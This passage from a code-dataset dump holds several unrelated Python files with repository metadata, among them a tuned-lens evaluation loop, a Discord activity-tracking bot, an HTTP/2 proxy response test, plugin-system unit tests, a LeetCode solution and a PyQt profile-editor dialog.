Batch output is modified in place.\n\n Args:\n lenses: The dictionary of lenses to evaluate on this hidden state.\n hidden: (batch x seq x d_model) The hidden states of the transformer.\n layer: The layer this hidden state is from.\n final_probs: (batch x seq x vocab) The final probabilities of\n the transformer.\n final_lps: (batch x seq x vocab) The final log probabilities\n of the transformer.\n labels: (batch x seq) The labels for the transformer.\n batch_output: Where to store the logging results.\n total_layers: The total number of layers in the transformer.\n logp_stats: where to record the logging results.\n \"\"\"\n for lens_type, lens in lenses.items():\n layer_name = f\"layer_{layer}\"\n lens_lps = lens(hidden, idx=layer).log_softmax(dim=-1)\n lens_probs = lens_lps.exp()\n\n self._record_logit_stats(lens_lps, layer, lens_type)\n\n batch_output[lens_type][\"ce\"][layer_name] = th.nn.functional.cross_entropy(\n shift_preds(lens_lps, self.token_shift).flatten(0, 1),\n labels.flatten(),\n reduction=\"none\",\n )\n\n batch_output[lens_type][\"entropy\"][layer_name] = th.sum(\n -lens_probs * lens_lps, dim=-1\n )\n\n batch_output[lens_type][\"kl\"][layer_name] = th.sum(\n final_probs * (final_lps - lens_lps), dim=-1\n )\n\n if self.layer_transfer:\n for i in range(total_layers):\n trans_name = f\"layer_{i}\"\n transfer_lps = lens(hidden, idx=i).log_softmax(dim=-1)\n batch_output[lens_type][\"layer_transfer\"][\"ce\"][trans_name][\n layer_name\n ] = th.nn.functional.cross_entropy(\n shift_preds(transfer_lps, self.token_shift).flatten(0, 1),\n labels.flatten(),\n )\n batch_output[lens_type][\"layer_transfer\"][\"kl\"][trans_name][\n layer_name\n ] = th.sum(lens_probs * (lens_lps - transfer_lps), dim=-1).mean()\n\n @th.autocast(\"cuda\", enabled=th.cuda.is_available())\n @th.no_grad()\n def execute(self):\n \"\"\"Evaluates a TunedLens model against a transformer on a dataset.\"\"\"\n # Load model, tokenizer, data, and lens\n self.dist.init()\n model = tokenizer = data = lenses = nats_to_bpb = None\n\n # See comment in train_loop.py for why we do this\n load_device = self.dist.device if not self.dist.fsdp else None\n if self.dist.primary:\n # Let the primary processes populate the cache\n model, tokenizer = self.model.load(load_device)\n data, nats_to_bpb = self.data.load(tokenizer)\n lenses = self.load_lens(model)\n\n self.dist.barrier() # Wait for primary to finish filling the cache\n\n if not self.dist.primary:\n # Let the non-primary processes load from the cache\n model, tokenizer = self.model.load(load_device, must_use_cache=True)\n data, nats_to_bpb = self.data.load(tokenizer)\n lenses = self.load_lens(model)\n\n assert model and tokenizer and data and lenses and nats_to_bpb\n\n model = self.dist.shard_model(model)\n # Note since we are not training we can just move the lens to the device.\n # No need to use DDP\n lenses = {name: lens.to(self.dist.device) for name, lens in lenses.items()}\n dl = self.dist.dataloader(data)\n dl.seed(self.seed)\n\n for lens in lenses.values():\n lens.eval()\n\n if self.tokens is not None:\n tokens_per_sample = len(data[0][\"input_ids\"])\n batch_limit = self.calculate_batch_limit(tokens_per_sample)\n assert batch_limit > 0, \"Batch limit must be positive.\"\n dl = islice(dl, batch_limit)\n total = batch_limit\n else:\n total = len(data) // self.dist.world_size\n\n L = model.config.num_hidden_layers\n\n self._initialize_logit_stats_recorders(lenses, L)\n\n root_dir = self.output\n\n root_dir.mkdir(exist_ok=True, parents=True)\n\n batches = []\n\n 
self.dist.barrier()\n logger.info(\n f\"All processes initialized. Running evaluation on {total} batches.\"\n )\n\n pbar = tqdm(dl, desc=\"Evaluating\", position=self.dist.rank, total=total)\n for batch in pbar:\n batch = self.dist.send_to_device(batch)\n output = model(**batch, output_hidden_states=True)\n\n hidden_states = output.hidden_states[:-1]\n\n final_lps = output.logits.log_softmax(dim=-1)\n\n final_probs = final_lps.exp()\n assert not th.isnan(output.logits).any(), \"Logits are NaN\"\n\n labels = shift_labels(batch[\"input_ids\"], self.token_shift)\n\n batch_output = _nested_dict()\n\n # Compute tuned lens eval and statistics if applicable\n for j, h in zip(range(L), hidden_states):\n self._evaluate_lenses_on_hidden(\n lenses=lenses,\n hidden=h,\n layer=j,\n final_probs=final_probs,\n final_lps=final_lps,\n labels=labels,\n batch_output=batch_output,\n total_layers=L,\n )\n\n batch_output[\"baseline\"][\"ce\"][\"final\"] = th.nn.functional.cross_entropy(\n shift_preds(final_lps, self.token_shift).flatten(0, 1),\n labels.flatten(),\n reduction=\"none\",\n )\n batch_output[\"baseline\"][\"entropy\"][\"final\"] = th.sum(\n -final_probs * final_lps, dim=-1\n )\n\n batches.append(pytree_map(th.mean, batch_output)) # type: ignore[arg-type]\n\n self._record_logit_stats_final(final_lps)\n\n pbar.close()\n agg = pytree_map(lambda x: nats_to_bpb * x.mean(), pytree_stack(batches))\n agg = pytree_map(lambda x: maybe_all_reduce(x), agg)\n agg = pytree_map(lambda x: x.cpu().numpy().item(), agg)\n\n assert isinstance(agg, dict)\n\n batches = pytree_map(lambda x: nats_to_bpb * x, batches)\n batches = pytree_map(lambda x: maybe_all_reduce(x), batches)\n batches = pytree_map(lambda x: x.cpu().item(), batches)\n assert isinstance(batches, list)\n\n logit_stats = self._save_logit_stats()\n\n if self.dist.primary:\n with (root_dir / \"batches.jsonl\").open(\"w\") as f:\n json.dump(batches, f)\n\n with (root_dir / \"aggregate_metrics.json\").open(\"w\") as f:\n json.dump(agg, f)\n\n if self.record_logit_stats:\n with (root_dir / \"logit_stats.json\").open(\"w\") as f:\n json.dump(logit_stats, f)\n","repo_name":"AlignmentResearch/tuned-lens","sub_path":"tuned_lens/scripts/eval_loop.py","file_name":"eval_loop.py","file_ext":"py","file_size_in_byte":11726,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"81"} +{"seq_id":"2877788308","text":"import json\n\nimport requests\n\nclass SetOfApis:\n\n def __init__(self, application_parameters, key, phone_or_qr, account_type):\n self.domain = application_parameters[\"domain\"]\n self.attraction = application_parameters[\"attraction\"]\n self.environment = application_parameters[\"environment\"]\n self.site_code = application_parameters[\"site_code\"]\n # self.country_code = GuestParameters.get_country_code_without_plus_prefix(key)\n self.phone_or_qr = phone_or_qr\n self.account_type = account_type\n\n def api_create_qr_user_request(self):\n end_point = f'https://api-{self.environment}.pomvom.com/api/v3/accounts'\n print(\"print end point: \" + str(end_point))\n data = {\"domain\": self.domain,\n \"uniqueId\": self.phone_or_qr}\n\n create_qr_user = requests.post(end_point,\n headers={\"x-api-key\": \"system\", \"x-client-id\": \"system\",\n \"Content-Type\": \"application/json\"},\n data=json.dumps(data),\n verify=False)\n \n response = create_qr_user.status_code\n return 
response","repo_name":"dimayedunov/qa-monitoring-service","sub_path":"src/api/set_of_apis.py","file_name":"set_of_apis.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9915971554","text":"import discord\nimport activity\nimport datetime\nimport charts\n#import main\n\nfrom quickchart import QuickChart\nfrom datetime import date\nfrom datetime import timezone\nfrom datetime import datetime\nfrom activity import activity\nfrom charts import chart\nfrom discord.ext import commands, tasks;\n\ntoken = 'hi'\n\nintents = discord.Intents.default()\nintents.message_content = True\nintents.members = True\nintents.presences = True\n\nclass MyBot(commands.Bot):\n @tasks.loop(seconds=5)\n async def memberStatus(ctx):\n \"\"\"\n Rough logic outline, outputs an entry to data after every event ends. \n \"\"\"\n for i in users:\n currA = get_user_activity(i)\n\n if (status[i.name] == None and currA != None):\n backup_time[i.name] = datetime.now(timezone.utc)\n\n last_check[i.name] = status[i.name]\n status[i.name] = currA\n\n\n if (last_check[i.name] != None and status[i.name] == None):\n #print(\" -------------------------------------- hat\") \n #if (last_check[i.name].start == None): data[i.name].append(activity(backup_time[i.name], datetime.now(timezone.utc), last_check[i.name].name))\n data[i.name].append(activity(backup_time[i.name], datetime.now(timezone.utc), last_check[i.name].name))\n #else: data[i.name].append(activity(last_check[i.name].start, datetime.now(timezone.utc), last_check[i.name].name))\n #data[i.name].append(1)\n\n print('added!') \n #print(\"running!\")\n \n\nbot = MyBot(command_prefix='>', intents=intents)\n\n\"\"\"\nAll the events must be a coroutine. If they aren’t, \nthen you might get unexpected errors. 
In order to \nturn a function into a coroutine they must be async\ndef functions.\n\"\"\"\n\nusers = []\nstatus: dict[str, discord.Activity] = {}\nlast_check: dict[str, discord.Activity] = {}\nbackup_time: dict[str, datetime] = {}\ndata: dict[str, list] = {}\n#presentation: dict[str, dict[str, list]] = {}\n\ndef get_user_activity(i : discord.Member) -> discord.Activity:\n if (len(i.activities) > 0 and i.activities[0].type != discord.ActivityType.custom):\n return i.activities[0]\n else:\n return None\n\n@bot.event\nasync def on_ready():\n print(f'Logged on as {bot.user.name} \\n ---------')\n for i in bot.get_all_members():\n users.append(i)\n status[i.name] = get_user_activity(i)\n last_check[i.name] = None\n data[i.name] = []\n backup_time[i.name] = datetime.now(timezone.utc)\n bot.memberStatus.start()\n\n@bot.event\nasync def on_member_join(member):\n users.append(member)\n status[member.name] = member.activities\n last_check[member.name] = None\n \n@bot.command()\nasync def members(ctx):\n for i in users:\n await ctx.send(i.name)\n\n@bot.command()\nasync def ping(ctx):\n await ctx.send('pong')\n\n@bot.command()\nasync def info(ctx):\n for i in users:\n if (len(i.activities) > 0 and i.activities[0].type != discord.ActivityType.custom):\n\n #await ctx.send(data[i.name].size())\n await ctx.send(i.activities[0].name)\n else:\n await ctx.send(\"no activities\")\n\n@bot.command()\nasync def show_data(ctx):\n await ctx.send(data.items())\n await ctx.send('hi there')\n #for i in users:\n #if (data.get(i.name) != None):\n #await ctx.send(data[i.name])\n\n@bot.command()\nasync def chart(ctx):\n for key in users:\n activities = data[key.name]\n activity_names = []\n activity_times = []\n\n ###\n\n presentation = {}\n for i in activities:\n if (i.name in presentation):\n presentation[i.name] += i.time.total_seconds() / 60\n else:\n presentation[i.name] = i.time.total_seconds() / 60\n\n for i in presentation:\n activity_names.append(i)\n activity_times.append(presentation[i])\n print(presentation[i] * 60)\n\n ###\n\n qc = QuickChart()\n qc.config = {\n \"type\": \"bar\",\n \"data\": {\n \"type\": \"bar\",\n \"labels\": activity_names,\n \"datasets\": [{\n \"label\": \"screentime\",\n \"data\": activity_times\n\n }]\n }\n }\n\n # Print a chart URL\n #await ctx.send(key.name + \": \" + qc.get_url())\n\n # Print a short chart URL\n await ctx.send(key.name + \": \" + qc.get_short_url())\n\nbot.run(token)","repo_name":"fc4furret/screentime","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26955943292","text":"# # https://leetcode.com/problems/subsets-ii/\n# 90. Subsets II\n# Medium\n# 9K\n# 254\n# Companies\n# Given an integer array nums that may contain duplicates, return all possible \n# subsets\n# (the power set).\n\n# The solution set must not contain duplicate subsets. 
Return the solution in any order.\n\n \n\n# Example 1:\n\n# Input: nums = [1,2,2]\n# Output: [[],[1],[1,2],[1,2,2],[2],[2,2]]\n# Example 2:\n\n# Input: nums = [0]\n# Output: [[],[0]]\n\nfrom typing import List\ndef subsets2( nums: List[int]) -> List[List[int]]:\n n=len(nums)\n subsets=[]\n nums.sort()\n def dfs(idx, path):\n subsets.append(path)\n for i in range(idx, n):\n if i > idx and nums[i] == nums[i-1]:\n continue\n dfs(i+1, path+ [nums[i]])\n dfs(0, [])\n return subsets\n\nif __name__ == \"__main__\":\n nums = [1,2,2]\n print (\"{}\".format(subsets2(nums)))\n\n\n\n","repo_name":"smohapatra1/scripting","sub_path":"python/practice/start_again/2023/09212023/backtracking_subsetsII.py","file_name":"backtracking_subsetsII.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36491562818","text":"'''Գրել ծրագիր, որը օգտատիրոջից սպասում է մուտք՝ բառերի ցանկ, մինչև օգտագործողը թողնի մուտքագրման տողը դատարկ: \r\nԴրանից հետո օգտատիրոջ մուտքագրած բառերը պետք է ցուցադրվեն էկրանին, բայց առանց կրկնությունների՝ յուրաքանչյուրը մեկ անգամ։ \r\nԱյս դեպքում բառերը պետք է ցուցադրվեն նույն հաջորդականությամբ, որով դրանք մուտքագրվել են ստեղնաշարից'''\r\ndef words(lst):\r\n new_lst = []\r\n for i in lst:\r\n if i not in new_lst:\r\n new_lst.append(i)\r\n return new_lst[:-1]\r\n\r\ndef lstt(w):\r\n while w != '':\r\n w = input('enter the word: ')\r\n ml.append(w)\r\n return words(ml)\r\n\r\nml = []\r\nw = input('enter the word: ')\r\nml.append(w)\r\nprint(lstt(w))","repo_name":"Gohar00/Exercices","sub_path":"input_word_while.py","file_name":"input_word_while.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"hy","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26892666417","text":"import sys\nimport re\nIN = open('words.hist', 'r')\ndict = []\nfor line in IN:\n word = line.split(' ')[1]\n #print(word)\n re.sub('[,.]', '', word)\n dict.append(word.strip('\\n'))\n#print(repr(dict))\ninput = sys.stdin.read()\nwords = input.split(' ')\noutput = []\n\nfor w in words:\n realw = w.strip( '[.,]' )\n #print(realw)\n if realw not in dict:\n w = '*'+w\n output.append(w)\n\nchecked = ' '.join(output)\nprint(checked)\n","repo_name":"mwrea/SP19-LING-L245","sub_path":"01/spellchecker.py","file_name":"spellchecker.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"9668755130","text":"\"\"\"Test module for http2 responses.\"\"\"\nimport http\n\nfrom framework import tester\n\n__author__ = \"Tempesta Technologies, Inc.\"\n__copyright__ = \"Copyright (C) 2023 Tempesta Technologies, Inc.\"\n__license__ = \"GPL2\"\n\n\nclass H2ResponsesTestCase(tester.TempestaTest):\n clients = [\n {\n \"id\": \"curl\",\n \"type\": \"curl\",\n \"http2\": True,\n \"addr\": \"${tempesta_ip}:8765\",\n },\n ]\n\n tempesta = {\n \"config\": \"\"\"\n listen ${tempesta_ip}:8765 proto=h2;\n\n srv_group default {\n server ${server_ip}:8000;\n }\n\n vhost v_good {\n proxy_pass default;\n }\n tls_match_any_server_name;\n tls_certificate ${tempesta_workdir}/tempesta.crt;\n tls_certificate_key ${tempesta_workdir}/tempesta.key;\n cache 0;\n cache_fulfill * *;\n block_action attack reply;\n block_action error reply;\n http_chain {\n host == \"bad.com\"\t-> block;\n host == \"good.com\" -> v_good;\n }\n \"\"\",\n }\n\n backends = [\n {\n \"id\": \"nginx\",\n \"type\": \"nginx\",\n \"port\": \"8000\",\n \"status_uri\": 
\"http://${server_ip}:8000/nginx_status\",\n \"config\": \"\"\"\n pid ${pid};\n worker_processes auto;\n events {\n worker_connections 1024;\n use epoll;\n }\n http {\n keepalive_timeout ${server_keepalive_timeout};\n keepalive_requests ${server_keepalive_requests};\n sendfile on;\n tcp_nopush on;\n tcp_nodelay on;\n open_file_cache max=1000;\n open_file_cache_valid 30s;\n open_file_cache_min_uses 2;\n open_file_cache_errors off;\n error_log /dev/null emerg;\n access_log off;\n server {\n listen ${server_ip}:8000;\n location / {\n return 200;\n }\n location /nginx_status {\n stub_status on;\n }\n }\n }\n \"\"\",\n },\n ]\n\n def __setup_h2_responses_test(self):\n curl = self.get_client(\"curl\")\n self.start_all_servers()\n self.start_tempesta()\n return curl\n\n def __test_h2_response(self, curl, header_name, header_value, status):\n curl.headers[header_name] = header_value\n curl.start()\n self.wait_while_busy(curl)\n curl.stop()\n response = curl.last_response\n self.assertEqual(response.status, status)\n\n def test_h2_bad_host(self):\n curl = self.__setup_h2_responses_test()\n # perform and check `bad` request\n self.__test_h2_response(curl, \"Host\", \"bad.com\", http.HTTPStatus.FORBIDDEN)\n\n def test_h2_bad_header(self):\n curl = self.__setup_h2_responses_test()\n\n # perform and check `good` request.\n self.__test_h2_response(curl, \"Host\", \"good.com\", http.HTTPStatus.OK)\n # add invalid cookie header and check response.\n self.__test_h2_response(curl, \"cookie\", \"AAAAAA//dfsdf\", http.HTTPStatus.BAD_REQUEST)\n\n def test_h2_bad_forwarded_for_ip(self):\n curl = self.__setup_h2_responses_test()\n\n # perform request with invalid X-Forwarded-For header\n self.__test_h2_response(curl, \"X-Forwarded-For\", \"1.1.1.1.1.1\", http.HTTPStatus.BAD_REQUEST)\n","repo_name":"tempesta-tech/tempesta-test","sub_path":"http2_general/test_h2_responses.py","file_name":"test_h2_responses.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"9151441291","text":"\nimport py\nimport os\nfrom py._com import PyPlugins, MultiCall\n\npytest_plugins = \"xfail\"\n\nclass TestMultiCall:\n def test_uses_copy_of_methods(self):\n l = [lambda: 42]\n mc = MultiCall(l)\n l[:] = []\n res = mc.execute()\n return res == 42\n\n def test_call_passing(self):\n class P1:\n def m(self, __call__, x):\n assert __call__.currentmethod == self.m \n assert len(__call__.results) == 1\n assert not __call__.methods\n return 17\n\n class P2:\n def m(self, __call__, x):\n assert __call__.currentmethod == self.m \n assert __call__.args\n assert __call__.results == []\n assert __call__.methods\n return 23 \n \n p1 = P1() \n p2 = P2() \n multicall = MultiCall([p1.m, p2.m], 23)\n reslist = multicall.execute()\n assert len(reslist) == 2\n # ensure reversed order \n assert reslist == [23, 17]\n\n def test_optionalcallarg(self):\n class P1:\n def m(self, x):\n return x\n call = MultiCall([P1().m], 23)\n assert call.execute() == [23]\n assert call.execute(firstresult=True) == 23\n \n def test_call_subexecute(self):\n def m(__call__):\n subresult = __call__.execute(firstresult=True)\n return subresult + 1\n\n def n():\n return 1\n\n call = MultiCall([n, m])\n res = call.execute(firstresult=True)\n assert res == 2\n\n def test_call_exclude_other_results(self):\n def m(__call__):\n __call__.exclude_other_results()\n return 10\n\n def n():\n return 1\n\n call = MultiCall([n, n, m, n])\n res = call.execute()\n assert res == [10]\n # doesn't 
really make sense for firstresult-mode - because\n # we might not have had a chance to run at all. \n #res = call.execute(firstresult=True)\n #assert res == 10\n \n\nclass TestPyPlugins:\n def test_MultiCall(self):\n plugins = PyPlugins()\n assert hasattr(plugins, \"MultiCall\")\n\n def test_register(self):\n plugins = PyPlugins()\n class MyPlugin:\n pass\n my = MyPlugin()\n plugins.register(my)\n assert plugins.getplugins() == [my]\n my2 = MyPlugin()\n plugins.register(my2)\n assert plugins.getplugins() == [my, my2]\n\n assert plugins.isregistered(my)\n assert plugins.isregistered(my2)\n plugins.unregister(my)\n assert not plugins.isregistered(my)\n assert plugins.getplugins() == [my2]\n\n def test_onregister(self):\n plugins = PyPlugins()\n l = []\n class MyApi:\n def pyevent_plugin_registered(self, plugin):\n l.append(plugin)\n def pyevent_plugin_unregistered(self, plugin):\n l.remove(plugin)\n myapi = MyApi()\n plugins.register(myapi)\n assert len(l) == 1\n assert l[0] is myapi \n plugins.unregister(myapi)\n assert not l\n\n def test_call_methods(self):\n plugins = PyPlugins()\n class api1:\n def m(self, __call__, x):\n return x\n class api2:\n def m(self, __call__, x, y=33):\n return y \n plugins.register(api1())\n plugins.register(api2())\n res = plugins.call_firstresult(\"m\", x=5)\n assert plugins.call_firstresult(\"notexist\") is None\n\n assert res == 33\n reslist = plugins.call_each(\"m\", x=5)\n assert len(reslist) == 2\n assert 5 in reslist\n assert 33 in reslist\n assert plugins.call_each(\"notexist\") == []\n\n assert plugins.call_plugin(api1(), 'm', x=12) == 12\n assert plugins.call_plugin(api2(), 't') is None\n\n def test_call_none_is_no_result(self):\n plugins = PyPlugins()\n class api1:\n def m(self):\n return None\n class api2:\n def m(self, __call__):\n return 41\n plugins.register(api1())\n plugins.register(api1())\n plugins.register(api2())\n assert plugins.call_firstresult('m') == 41\n assert plugins.call_each('m') == [41]\n\n def test_call_noneasresult(self):\n plugins = PyPlugins()\n class api1:\n def m(self, __call__):\n return __call__.NONEASRESULT\n plugins.register(api1())\n plugins.register(api1())\n assert plugins.call_firstresult('m') is None\n assert plugins.call_each('m') == [None, None]\n\n def test_listattr(self):\n plugins = PyPlugins()\n class api1:\n x = 41\n class api2:\n x = 42\n class api3:\n x = 43\n plugins.register(api1())\n plugins.register(api2())\n plugins.register(api3())\n l = list(plugins.listattr('x'))\n assert l == [41, 42, 43]\n l = list(plugins.listattr('x', reverse=True))\n assert l == [43, 42, 41]\n\n def test_notify_anonymous_ordered(self):\n plugins = PyPlugins()\n l = []\n class api1:\n def pyevent_hello(self): \n l.append(\"hellospecific\")\n class api2:\n def pyevent(self, name, *args): \n if name == \"hello\":\n l.append(name + \"anonymous\") \n plugins.register(api1())\n plugins.register(api2())\n plugins.notify('hello')\n assert l == [\"hellospecific\", \"helloanonymous\"]\n\n def test_consider_env(self, monkeypatch):\n plugins = PyPlugins()\n monkeypatch.setitem(os.environ, 'PYLIB', \"unknownconsider_env\")\n py.test.raises(ImportError, \"plugins.consider_env()\")\n\n def test_consider_module(self):\n plugins = PyPlugins()\n mod = py.std.new.module(\"temp\")\n mod.pylib = [\"xxx nomod\"]\n excinfo = py.test.raises(ImportError, \"plugins.consider_module(mod)\")\n mod.pylib = \"os\"\n class Events(list):\n def pyevent_importingmodule(self, mod):\n self.append(mod)\n l = Events()\n plugins.register(l)\n 
plugins.consider_module(mod)\n assert len(l) == 1\n assert l[0] == (mod.pylib)\n\ndef test_api_and_defaults():\n assert isinstance(py._com.pyplugins, PyPlugins)\n\ndef test_subprocess_env(testdir, monkeypatch):\n plugins = PyPlugins()\n old = py.path.local(py.__file__).dirpath().dirpath().chdir()\n try:\n monkeypatch.setitem(os.environ, \"PYLIB\", 'unknownconsider')\n excinfo = py.test.raises(py.process.cmdexec.Error, \"\"\"\n py.process.cmdexec('%s -c \"import py\"')\n \"\"\" % py.std.sys.executable)\n assert str(excinfo.value).find(\"ImportError\") != -1\n assert str(excinfo.value).find(\"unknownconsider\") != -1\n finally:\n old.chdir()\n\nclass TestPyPluginsEvents:\n def test_pyevent_named_dispatch(self):\n plugins = PyPlugins()\n l = []\n class A:\n def pyevent_name(self, x): \n l.append(x)\n plugins.register(A())\n plugins.notify(\"name\", 13)\n assert l == [13]\n\n def test_pyevent_anonymous_dispatch(self):\n plugins = PyPlugins()\n l = []\n class A:\n def pyevent(self, name, *args, **kwargs): \n if name == \"name\":\n l.extend([args, kwargs])\n\n plugins.register(A())\n plugins.notify(\"name\", 13, x=15)\n assert l == [(13, ), {'x':15}]\n\n","repo_name":"woodrow/pyoac","sub_path":"py/misc/testing/test_com.py","file_name":"test_com.py","file_ext":"py","file_size_in_byte":7556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42321661695","text":"import os\nimport time\n\nft=open('D:\\\\text.txt')\ns=ft.read()\nprint(s)\n\n'''\n#file_object = open('test.txt') \n#//不要把open放在try中,以防止打开失败,那么就不用关闭了\ntry:\n file_context = file_object.read() \n //file_context是一个string,读取完后,就失去了对test.txt的文件引用\n # file_context = open(file).read().splitlines() \n // file_context是一个list,每行文本内容是list中的一个元素\n\nfinally:\n file_object.close()\n\n//除了以上方法,也可用with、contextlib都可以打开文件,且自动关闭文件,\n//以防止打开的文件对象未关闭而占用内存\n\n'''\n\nt=time.time()\nt=int(t)\nprint(t)\nft=open('D:\\\\text.txt','w')\nft.write(str(t))\nft=open('D:\\\\text.txt')\nftt=ft.read()\nprint(ftt)\ntime.sleep(2)\n\ndef biaoji_time():\n t=time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n t=time.time()\n t=int(t)\n ft=open('D:\\\\text.txt','w')\n ft.write(str(t))\n ft.close()\n\nbiaoji_time()","repo_name":"woshichenya/hezi","sub_path":"All/python_all/PythonTongyong/txt2.py","file_name":"txt2.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7615652983","text":"import pickle\nfrom typing import Optional\n\nimport emoji\nfrom PyQt6.QtCore import Qt, QMimeData, QObject, QEvent, QByteArray\nfrom PyQt6.QtGui import QDrag, QMouseEvent\nfrom PyQt6.QtWidgets import QDialog, QToolButton\nfrom overrides import overrides\nfrom qthandy import ask_confirmation\n\nfrom src.main.python.plotlyst.core.domain import Novel\nfrom src.main.python.plotlyst.core.template import age_field, \\\n enneagram_field, TemplateField, TemplateFieldType, ProfileTemplate, misbelief_field, \\\n default_character_profiles, mbti_field, traits_field\nfrom src.main.python.plotlyst.model.template import TemplateFieldSelectionModel\nfrom src.main.python.plotlyst.service.persistence import RepositoryPersistenceManager\nfrom src.main.python.plotlyst.view.common import emoji_font\nfrom src.main.python.plotlyst.view.generated.character_profile_editor_dialog_ui import Ui_CharacterProfileEditorDialog\nfrom src.main.python.plotlyst.view.icons import IconRegistry\nfrom src.main.python.plotlyst.view.widget.template.profile import 
ProfileTemplateEditor\n\n\nclass CharacterProfileEditorDialog(Ui_CharacterProfileEditorDialog, QDialog):\n MimeType: str = 'application/template-field'\n\n def __init__(self, profile: ProfileTemplate, parent=None):\n super().__init__(parent)\n\n self.setupUi(self)\n self.profile = profile\n self._restore_requested: bool = False\n\n self.btnAge.setIcon(IconRegistry.from_name('mdi.numeric'))\n self.btnEnneagram.setIcon(IconRegistry.from_name('mdi.numeric-9-box-outline'))\n self.btnMbti.setIcon(IconRegistry.from_name('ei.group-alt'))\n self.btnTraits.setIcon(IconRegistry.from_name('ei.adjust'))\n self.btnMisbelief.setIcon(IconRegistry.error_icon())\n self.btnCustomText.setIcon(IconRegistry.from_name('mdi.format-text'))\n self.btnCustomNumber.setIcon(IconRegistry.from_name('mdi.numeric'))\n self.btnCustomChoices.setIcon(IconRegistry.from_name('mdi.format-list-bulleted-type'))\n\n self.btnSettings.setIcon(IconRegistry.from_name('ei.cog'))\n self.btnSettings.toggled.connect(self.wdgSettings.setVisible)\n\n self.profile_editor = ProfileTemplateEditor(self.profile)\n self.wdgEditor.layout().addWidget(self.profile_editor)\n\n self.btnRestore.setIcon(IconRegistry.restore_alert_icon('white'))\n self.btnRestore.clicked.connect(self._restore_default)\n\n for w in self.profile_editor.widgets:\n self._field_added(w.field)\n\n self._selected_field: Optional[TemplateField] = None\n\n self.profile_editor.fieldAdded.connect(self._field_added)\n self.profile_editor.fieldSelected.connect(self._field_selected)\n self.profile_editor.placeholderSelected.connect(self._placeholder_selected)\n self.btnRemove.setIcon(IconRegistry.minus_icon())\n self.btnRemove.clicked.connect(self._remove_field)\n\n self.lineLabel.textEdited.connect(self._label_edited)\n self.lineEmoji.setFont(emoji_font())\n self.lineEmoji.textEdited.connect(self._emoji_edited)\n\n self.btnAge.installEventFilter(self)\n self.btnEnneagram.installEventFilter(self)\n self.btnMbti.installEventFilter(self)\n self.btnTraits.installEventFilter(self)\n self.btnMisbelief.installEventFilter(self)\n self.btnCustomText.installEventFilter(self)\n self.btnCustomNumber.installEventFilter(self)\n self.btnCustomChoices.installEventFilter(self)\n\n self._dragged: Optional[QToolButton] = None\n self.cbShowLabel.clicked.connect(self._show_label_clicked)\n self.btnCancel.clicked.connect(self.reject)\n self.btnSave.clicked.connect(self.accept)\n\n self.stackedSettings.setCurrentWidget(self.pageInfo)\n\n @overrides\n def eventFilter(self, watched: QObject, event: QEvent) -> bool:\n self._dragged = watched\n if event.type() == QEvent.Type.MouseButtonPress:\n self.mousePressEvent(event)\n elif event.type() == QEvent.Type.MouseMove:\n self.mouseMoveEvent(event)\n elif event.type() == QEvent.Type.MouseButtonRelease:\n self.mouseReleaseEvent(event)\n return super().eventFilter(watched, event)\n\n @overrides\n def mousePressEvent(self, event: QMouseEvent):\n self._dragged = None\n\n @overrides\n def mouseMoveEvent(self, event: QMouseEvent):\n if event.buttons() & Qt.MouseButton.LeftButton and self._dragged and self._dragged.isEnabled():\n drag = QDrag(self._dragged)\n pix = self._dragged.grab()\n if self._dragged is self.btnAge:\n field = age_field\n elif self._dragged is self.btnEnneagram:\n field = enneagram_field\n elif self._dragged is self.btnMbti:\n field = mbti_field\n elif self._dragged is self.btnTraits:\n field = traits_field\n elif self._dragged is self.btnMisbelief:\n field = misbelief_field\n elif self._dragged is self.btnCustomText:\n field = 
TemplateField(name='Label', type=TemplateFieldType.TEXT, custom=True)\n elif self._dragged is self.btnCustomNumber:\n field = TemplateField(name='Label', type=TemplateFieldType.NUMERIC, custom=True, compact=True)\n elif self._dragged is self.btnCustomChoices:\n field = TemplateField(name='Label', type=TemplateFieldType.TEXT_SELECTION, custom=True, compact=True)\n else:\n field = TemplateField(name=self._dragged.text(), type=TemplateFieldType.TEXT)\n mimedata = QMimeData()\n mimedata.setData(self.MimeType, QByteArray(pickle.dumps(field)))\n drag.setMimeData(mimedata)\n drag.setPixmap(pix)\n drag.setHotSpot(event.pos())\n drag.destroyed.connect(self._dragDestroyed)\n drag.exec_()\n\n def display(self) -> Optional[ProfileTemplate]:\n result = self.exec()\n\n if result == QDialog.DialogCode.Rejected:\n return None\n if self._restore_requested:\n return default_character_profiles()[0]\n return self.profile_editor.profile()\n\n def _dragDestroyed(self):\n self._dragged = None\n\n def _field_added(self, field: TemplateField):\n self._enable_in_inventory(field, False)\n if field.custom:\n self.btnSettings.setChecked(True)\n\n def _enable_in_inventory(self, field: TemplateField, enabled: bool):\n if field.id == age_field.id:\n self.btnAge.setEnabled(enabled)\n elif field.id == enneagram_field.id:\n self.btnEnneagram.setEnabled(enabled)\n elif field.id == mbti_field.id:\n self.btnMbti.setEnabled(enabled)\n elif field.id == traits_field.id:\n self.btnTraits.setEnabled(enabled)\n elif field.id == misbelief_field.id:\n self.btnMisbelief.setEnabled(enabled)\n\n def _field_selected(self, field: TemplateField):\n self._selected_field = field\n self.stackedSettings.setCurrentWidget(self.pageSettings)\n self.btnRemove.setEnabled(True)\n 